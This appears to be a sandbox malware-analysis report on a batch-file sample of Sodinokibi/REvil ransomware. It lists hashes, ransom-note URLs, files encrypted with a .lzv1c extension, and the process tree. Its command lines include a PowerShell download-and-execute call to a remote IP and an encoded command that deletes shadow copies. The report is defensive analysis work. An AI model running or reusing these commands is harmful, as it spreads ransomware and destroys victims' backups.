Analysis
  max time kernel: 36s
  max time network: 37s
  platform: windows7_x64
  resource: win7v200722
  submitted: 15-08-2020 18:10
Static task: static1
Behavioral task: behavioral1
  Sample: 7cd0bfdb268bef7da1671e95b6f5aa33.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 7cd0bfdb268bef7da1671e95b6f5aa33.bat
  Resource: win10
General
  Target: 7cd0bfdb268bef7da1671e95b6f5aa33.bat
  Size: 216B
  MD5: a5ff6055fd55ba2b81de2d9b7100ec8a
  SHA1: b8df51a999fc532ba49b2f5769ed7b850ca94f75
  SHA256: 60f07d4e5bfcf8fc08bf003d47aa6915f9c2dd834aa0b75985106206216a460c
  SHA512: 9596d6d408462e5eea678ffa474b6fca135fe71ad024ce6e080ef350ec370c7820585e805e58f44e11cd1fb362badc39878794e505343892c6eb4cbbccbca20d
Malware Config
  Extracted from: http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33
  Extracted from: C:\lzv1c-readme.txt
    Family: sodinokibi
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/525AF2391A87112C
    http://decryptor.cc/525AF2391A87112C
Signatures
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (1 IoC)
Processes:
  flow | pid | process
  3 | 528 | powershell.exe
Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
Processes:
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\StartComplete.tif => \??\c:\users\admin\pictures\StartComplete.tif.lzv1c | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\TestReset.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\PopJoin.tif => \??\c:\users\admin\pictures\PopJoin.tif.lzv1c | powershell.exe
  File renamed | C:\Users\Admin\Pictures\RepairConvert.raw => \??\c:\users\admin\pictures\RepairConvert.raw.lzv1c | powershell.exe
  File renamed | C:\Users\Admin\Pictures\TestReset.tiff => \??\c:\users\admin\pictures\TestReset.tiff.lzv1c | powershell.exe
  File renamed | C:\Users\Admin\Pictures\UnblockRedo.tif => \??\c:\users\admin\pictures\UnblockRedo.tif.lzv1c | powershell.exe
  File renamed | C:\Users\Admin\Pictures\MoveMeasure.png => \??\c:\users\admin\pictures\MoveMeasure.png.lzv1c | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ResumeUninstall.png => \??\c:\users\admin\pictures\ResumeUninstall.png.lzv1c | powershell.exe
  File renamed | C:\Users\Admin\Pictures\SearchShow.png => \??\c:\users\admin\pictures\SearchShow.png.lzv1c | powershell.exe
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\o79gyj.bmp" | powershell.exe
Drops file in Program Files directory (37 IoCs)
Processes:
  description | ioc | process
  File opened for modification | \??\c:\program files\RepairExport.pptx | powershell.exe
  File opened for modification | \??\c:\program files\SubmitInstall.au3 | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\lzv1c-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CompareRedo.wmf | powershell.exe
  File opened for modification | \??\c:\program files\ConvertFromSearch.vb | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\lzv1c-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ReceiveOpen.mpg | powershell.exe
  File opened for modification | \??\c:\program files\BackupClose.tiff | powershell.exe
  File opened for modification | \??\c:\program files\CloseUnprotect.docx | powershell.exe
  File opened for modification | \??\c:\program files\RestoreNew.mhtml | powershell.exe
  File opened for modification | \??\c:\program files\SavePop.ogg | powershell.exe
  File opened for modification | \??\c:\program files\UnprotectLock.vst | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\lzv1c-readme.txt | powershell.exe
  File created | \??\c:\program files\lzv1c-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ImportRemove.m3u | powershell.exe
  File opened for modification | \??\c:\program files\PopBackup.m4a | powershell.exe
  File opened for modification | \??\c:\program files\ResizeReset.wma | powershell.exe
  File opened for modification | \??\c:\program files\ResumeTest.AAC | powershell.exe
  File opened for modification | \??\c:\program files\SendRequest.png | powershell.exe
  File opened for modification | \??\c:\program files\ConvertFromPush.TTS | powershell.exe
  File opened for modification | \??\c:\program files\EditHide.TS | powershell.exe
  File opened for modification | \??\c:\program files\LockSearch.ADT | powershell.exe
  File opened for modification | \??\c:\program files\RepairEdit.temp | powershell.exe
  File opened for modification | \??\c:\program files\SaveInvoke.dib | powershell.exe
  File opened for modification | \??\c:\program files\UndoCompress.pub | powershell.exe
  File created | \??\c:\program files (x86)\lzv1c-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CompleteSplit.tif | powershell.exe
  File opened for modification | \??\c:\program files\PopStop.vb | powershell.exe
  File opened for modification | \??\c:\program files\FormatInitialize.mht | powershell.exe
  File opened for modification | \??\c:\program files\HideExpand.css | powershell.exe
  File opened for modification | \??\c:\program files\EditResume.au | powershell.exe
  File opened for modification | \??\c:\program files\EnableDismount.css | powershell.exe
  File opened for modification | \??\c:\program files\RenameSkip.wmv | powershell.exe
  File opened for modification | \??\c:\program files\StopFormat.scf | powershell.exe
  File opened for modification | \??\c:\program files\UninstallApprove.vssm | powershell.exe
  File opened for modification | \??\c:\program files\ConvertFromExit.pps | powershell.exe
  File opened for modification | \??\c:\program files\DisableDebug.rtf | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid | process
  528 | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid | process
  528 | powershell.exe
  528 | powershell.exe
  528 | powershell.exe
  1272 | powershell.exe
  1272 | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 528 | powershell.exe
  Token: SeDebugPrivilege | 528 | powershell.exe
  Token: SeDebugPrivilege | 1272 | powershell.exe
  Token: SeBackupPrivilege | 628 | vssvc.exe
  Token: SeRestorePrivilege | 628 | vssvc.exe
  Token: SeAuditPrivilege | 628 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 528 | powershell.exe
Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
  description | pid | process | target process
  PID 1436 wrote to memory of 528 | 1436 | cmd.exe | powershell.exe
  PID 1436 wrote to memory of 528 | 1436 | cmd.exe | powershell.exe
  PID 1436 wrote to memory of 528 | 1436 | cmd.exe | powershell.exe
  PID 1436 wrote to memory of 528 | 1436 | cmd.exe | powershell.exe
  PID 528 wrote to memory of 1272 | 528 | powershell.exe | powershell.exe
  PID 528 wrote to memory of 1272 | 528 | powershell.exe | powershell.exe
  PID 528 wrote to memory of 1272 | 528 | powershell.exe | powershell.exe
  PID 528 wrote to memory of 1272 | 528 | powershell.exe | powershell.exe
Processes
C:\Windows\system32\cmd.exe (PID 1436, level 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\7cd0bfdb268bef7da1671e95b6f5aa33.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 528, level 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33');Invoke-CROBJXDEH;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1272, level 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\vssvc.exe (PID 628, level 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken